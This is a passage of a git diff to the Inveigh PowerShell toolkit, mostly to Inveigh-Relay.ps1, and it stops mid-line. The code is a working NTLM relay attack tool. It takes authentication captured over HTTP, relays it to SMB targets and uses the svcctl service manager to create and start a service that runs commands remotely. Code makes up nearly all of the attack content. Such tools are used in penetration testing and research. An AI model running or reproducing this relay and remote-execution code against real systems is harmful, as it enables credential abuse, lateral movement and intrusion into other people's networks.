diff options
| -rw-r--r-- | Inveigh-Relay.ps1 | 401 | ||||
| -rw-r--r-- | Inveigh.ps1 | 353 | ||||
| -rw-r--r-- | Invoke-SMBClient.ps1 | 90 | ||||
| -rw-r--r-- | Invoke-SMBExec.ps1 | 116 |
4 files changed, 495 insertions, 465 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1 index 49c5629..dfd9500 100644 --- a/Inveigh-Relay.ps1 +++ b/Inveigh-Relay.ps1 @@ -238,6 +238,11 @@ if($Attack -eq 'Execute' -and !$Command) Write-Output "[-] -Command requiried with -Attack Execute" throw } +elseif($Attack -eq 'Session' -and $SMB1) +{ + Write-Output "[-] -SMB1 not suppported with -Attack Session" + throw +} if(!$FileOutputDirectory) { @@ -396,6 +401,11 @@ else $inveigh.newline = "" } +if($inveigh.running) +{ + $inveigh.output_pause = $true +} + # Write startup messages $inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null @@ -410,7 +420,7 @@ if($HTTP -eq 'Y') if($HTTP_port_check) { $HTTP = "N" - $inveigh.output_queue.Add("[+] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null + $inveigh.output_queue.Add("[-] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null } else { @@ -727,7 +737,7 @@ elseif($RunTime -gt 1) if($ShowHelp -eq 'Y') { - $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop Inveigh-Relay") > $null + $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop manually") > $null if($inveigh.console_output) { @@ -796,10 +806,10 @@ while($inveigh.output_queue.Count -gt 0) } -$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id -$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) -$process_ID = $process_ID -replace "-00-00","" -[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} +if($inveigh.running) +{ + $inveigh.output_pause = $false +} # Begin ScriptBlocks @@ -812,6 +822,7 @@ $shared_basic_functions_scriptblock = param ([Int]$length_start,[Byte[]]$string_extract_data) $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + return $string_length } @@ -820,6 +831,7 @@ $shared_basic_functions_scriptblock = param ([Int]$length_start,[Byte[]]$string_extract_data) $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0) + return $string_length } @@ -831,6 +843,7 @@ $shared_basic_functions_scriptblock = $string_data = $string_data -replace "-00","" $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $string_extract = New-Object System.String ($string_data,0,$string_data.Length) + return $string_extract } @@ -851,6 +864,16 @@ $packet_functions_scriptblock = return $byte_array } + function Get-ProcessIDArray + { + $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id + $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) + [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + return $process_ID_bytes + } + + #NetBIOS function New-PacketNetBIOSSessionService @@ -873,6 +896,8 @@ $packet_functions_scriptblock = { param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) + $packet_process_ID = $packet_process_ID[0,1] + $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $packet_SMBHeader.Add("Command",$packet_command) @@ -1087,7 +1112,7 @@ $packet_functions_scriptblock = function New-PacketSMB2Header { - param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) + param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 @@ -1102,7 +1127,7 @@ $packet_functions_scriptblock = $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("MessageID",$packet_message_ID) - $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("ProcessID",$packet_process_ID) $packet_SMB2Header.Add("TreeID",$packet_tree_ID) $packet_SMB2Header.Add("SessionID",$packet_session_ID) $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) @@ -1110,6 +1135,15 @@ $packet_functions_scriptblock = return $packet_SMB2Header } + function New-PacketSMB2Echo + { + $packet_SMB2EchoRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2EchoRequest.Add("StructureSize",[Byte[]](0x04,0x00)) + $packet_SMB2EchoRequest.Add("Reserved",[Byte[]](0x00,0x00)) + + return $packet_SMB2EchoRequest + } + function New-PacketSMB2NegotiateProtocolRequest { $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary @@ -1596,7 +1630,7 @@ $SMB_relay_functions_scriptblock = function SMBRelayChallenge { - param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$signing_check) + param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_process_ID) if($SMB_relay_socket) { @@ -1614,7 +1648,7 @@ $SMB_relay_functions_scriptblock = 'NegotiateSMB' { - $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00 + $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00 $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1627,8 +1661,20 @@ $SMB_relay_functions_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42') { - $SMB_version = 'SMB1' - $SMB_client_stage = 'NTLMSSPNegotiate' + + if($Attack -eq 'Session') + { + $inveigh.target_list.Remove($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed target $($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) due to SMB1 requirement") + $SMB_relay_socket.Close() + $SMB_client_stage = 'exit' + } + else + { + $SMB_version = 'SMB1' + $SMB_client_stage = 'NTLMSSPNegotiate' + } + } else { @@ -1656,7 +1702,7 @@ $SMB_relay_functions_scriptblock = $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_message_ID = 1 - $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -1674,7 +1720,7 @@ $SMB_relay_functions_scriptblock = if($SMB_version -eq 'SMB1') { - $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00 + $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00 $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)] $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1686,8 +1732,8 @@ $SMB_relay_functions_scriptblock = } else { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)] $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1713,7 +1759,7 @@ $SMB_relay_functions_scriptblock = function SMBRelayResponse { - param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID) + param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID) $SMB_client_receive = New-Object System.Byte[] 1024 @@ -1724,7 +1770,7 @@ $SMB_relay_functions_scriptblock = if($SMB_version -eq 'SMB1') { - $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID $packet_SMB_header["UserID"] = $SMB_user_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header @@ -1739,7 +1785,7 @@ $SMB_relay_functions_scriptblock = { $SMB2_message_ID = 3 $SMB2_tree_ID = 0x00,0x00,0x00,0x00 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth @@ -1764,10 +1810,10 @@ $SMB_relay_functions_scriptblock = if($HTTP_NTLM_domain_string -ne '') { - $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null } - $inveigh.relay_list.Add("$HTTP_source_IP $Target") + $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null $SMB_relay_failed = $true $SMB_relay_socket.Close() $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication failed for $HTTP_username_full on $Target") > $null @@ -1778,7 +1824,7 @@ $SMB_relay_functions_scriptblock = function SMBRelayExecute { - param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID) + param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID) $SMB_client_receive = New-Object System.Byte[] 1024 @@ -1852,7 +1898,7 @@ $SMB_relay_functions_scriptblock = 'TreeConnectAndXRequest' { - $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1869,7 +1915,7 @@ $SMB_relay_functions_scriptblock = { $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl $SMB_tree_ID = $SMB_client_receive[28,29] - $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1885,7 +1931,7 @@ $SMB_relay_functions_scriptblock = 'RPCBind' { $SMB_FID = $SMB_client_receive[42,43] - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -1905,7 +1951,7 @@ $SMB_relay_functions_scriptblock = 'ReadAndXRequest' { Start-Sleep -m 150 - $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBReadAndXRequest $packet_SMB_data["FID"] = $SMB_FID @@ -1921,7 +1967,7 @@ $SMB_relay_functions_scriptblock = 'OpenSCManagerW' { - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 @@ -1967,12 +2013,12 @@ $SMB_relay_functions_scriptblock = if($HTTP_NTLM_domain_string -ne '') { - $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null } if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target")) { - $inveigh.relay_list.Add("$HTTP_source_IP $Target") + $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null } $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have execution privilege on $Target") > $null @@ -1986,7 +2032,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW' { - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 @@ -2008,7 +2054,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)] $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length) @@ -2040,7 +2086,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_Middle' { $SMB_split_stage++ - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)] $SMB_split_index_tracker += $SMB_split_index $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle @@ -2070,7 +2116,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_Last' { - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length] $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -2096,7 +2142,7 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service created on $Target") > $null $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute SMB relay command on $Target") > $null $SMB_service_context_handle = $SMB_client_receive[92..111] - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00 @@ -2138,7 +2184,7 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service failed to start on $Target") > $null } - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00 @@ -2173,7 +2219,7 @@ $SMB_relay_functions_scriptblock = $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -2191,7 +2237,7 @@ $SMB_relay_functions_scriptblock = 'CloseRequest' { - $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40 $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -2206,7 +2252,7 @@ $SMB_relay_functions_scriptblock = 'TreeDisconnect' { - $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBTreeDisconnectRequest $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -2221,7 +2267,7 @@ $SMB_relay_functions_scriptblock = 'Logoff' { - $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBLogoffAndXRequest $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -2260,7 +2306,7 @@ $SMB_relay_functions_scriptblock = { $SMB2_message_ID = 4 $SMB2_tree_ID = 0x00,0x00,0x00,0x00 - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2277,8 +2323,8 @@ $SMB_relay_functions_scriptblock = { $SMB2_tree_ID = 0x01,0x00,0x00,0x00 $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes $packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header @@ -2296,8 +2342,8 @@ $SMB_relay_functions_scriptblock = { $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB_file_ID = $SMB_client_receive[132..147] - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length @@ -2316,12 +2362,11 @@ $SMB_relay_functions_scriptblock = 'ReadRequest' { - Start-Sleep -m 150 - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditCharge"] = 0x10,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID + $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length @@ -2355,8 +2400,8 @@ $SMB_relay_functions_scriptblock = 'OpenSCManagerW' { - $SMB2_message_ID = 30 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 @@ -2383,13 +2428,12 @@ $SMB_relay_functions_scriptblock = $SMB_service_manager_context_handle = $SMB_client_receive[108..127] $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has required privilege on $Target") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has command execution privilege on $Target") > $null if($Attack -eq 'Session') { $SMB_administrator = $true $SMB_close_service_handle_stage = 2 - $SMB2_message_ID += 19 $SMB_client_stage = 'CloseServiceHandle' } elseif($SCM_data.Length -lt $SMB_split_index) @@ -2407,24 +2451,24 @@ $SMB_relay_functions_scriptblock = if($HTTP_NTLM_domain_string -ne '') { - $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null } if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target")) { - $inveigh.relay_list.Add("$HTTP_source_IP $Target") + $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null } if($Attack -ne 'Session') { $SMB_relay_failed = $true - $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target") > $null } - $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have required privilege on $Target") > $null + $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have command execution privilege on $Target") > $null $SMB_service_manager_context_handle = $SMB_client_receive[108..127] $SMB_close_service_handle_stage = 2 - $SMB2_message_ID += 19 + $SMB2_message_ID++ $SMB_client_stage = 'CloseServiceHandle' } else @@ -2436,8 +2480,8 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length) @@ -2457,13 +2501,13 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)] $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 